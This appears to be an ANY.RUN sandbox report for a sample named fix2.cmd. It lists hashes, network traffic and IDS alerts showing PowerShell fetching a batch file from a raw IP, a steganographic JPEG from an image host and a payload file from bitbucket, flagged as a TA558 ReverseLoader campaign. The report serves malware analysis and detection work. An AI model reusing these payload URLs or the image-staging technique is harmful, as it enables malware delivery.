6836powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4y33apbe.ubg.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
49
TCP/UDP connections
50
DNS requests
18
Threats
14

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5944
MoUsoCoreWorker.exe
GET
200
23.216.77.28:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
DE
binary
825 b
whitelisted
1268
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
NL
binary
814 b
whitelisted
POST
400
20.190.159.130:443
https://login.live.com/ppsecure/deviceaddcredential.srf
US
unknown
4832
powershell.exe
GET
200
206.82.9.203:80
http://206.82.9.203/WindowsUpdate.bat
US
text
9.74 Kb
unknown
GET
200
45.43.142.0:443
https://i.ibb.co/7dbGKwXZ/image.jpg?12711343
US
image
2.29 Mb
unknown
GET
404
185.166.143.49:443
https://bitbucket.org/nbiuityt/replot/raw/main/payload_1756486488_7258.txt
DE
html
14.9 Kb
unknown
GET
304
135.233.95.144:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
US
unknown
3944
RUXIMICS.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
NL
binary
814 b
whitelisted
POST
200
40.126.31.131:443
https://login.live.com/RST2.srf
US
xml
1.24 Kb
unknown
POST
400
40.126.31.3:443
https://login.live.com/ppsecure/deviceaddcredential.srf
US
text
203 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
5944
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1268
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3944
RUXIMICS.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
5944
MoUsoCoreWorker.exe
23.216.77.28:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5944
MoUsoCoreWorker.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
3944
RUXIMICS.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
1268
svchost.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
5944
MoUsoCoreWorker.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.124.78.146
whitelisted
google.com
  • 142.250.185.238
whitelisted
crl.microsoft.com
  • 23.216.77.28
  • 23.216.77.6
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 184.30.21.171
whitelisted
login.live.com
  • 20.190.159.71
  • 40.126.31.69
  • 20.190.159.4
  • 40.126.31.2
  • 40.126.31.67
  • 40.126.31.3
  • 40.126.31.73
  • 40.126.31.131
whitelisted
i.ibb.co
  • 45.43.142.2
  • 45.43.142.6
  • 45.43.142.4
  • 45.43.142.7
  • 45.43.142.5
  • 45.43.142.3
shared
bitbucket.org
  • 185.166.143.50
  • 185.166.143.49
  • 185.166.143.48
whitelisted
slscr.update.microsoft.com
  • 74.179.77.204
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted
self.events.data.microsoft.com
  • 20.42.65.89
whitelisted

Threats

PID
Process
Class
Message
4832
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
6664
powershell.exe
Not Suspicious Traffic
INFO [ANY.RUN] Image hosting service ImgBB
A Network Trojan was detected
PAYLOAD [ANY.RUN] Stegocampaign Jpeg with base64 added (TA558)
A Network Trojan was detected
ET MALWARE ReverseLoader Reverse Base64 Encoded Executable In Image M2
1936
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
A Network Trojan was detected
PAYLOAD [ANY.RUN] Stegocampaign Jpeg with base64 added (TA558)
A Network Trojan was detected
ET MALWARE ReverseLoader Reverse Base64 Encoded Executable In Image M2
1336
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
5968
powershell.exe
Not Suspicious Traffic
INFO [ANY.RUN] Image hosting service ImgBB
A Network Trojan was detected
PAYLOAD [ANY.RUN] Stegocampaign Jpeg with base64 added (TA558)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
fix2.cmd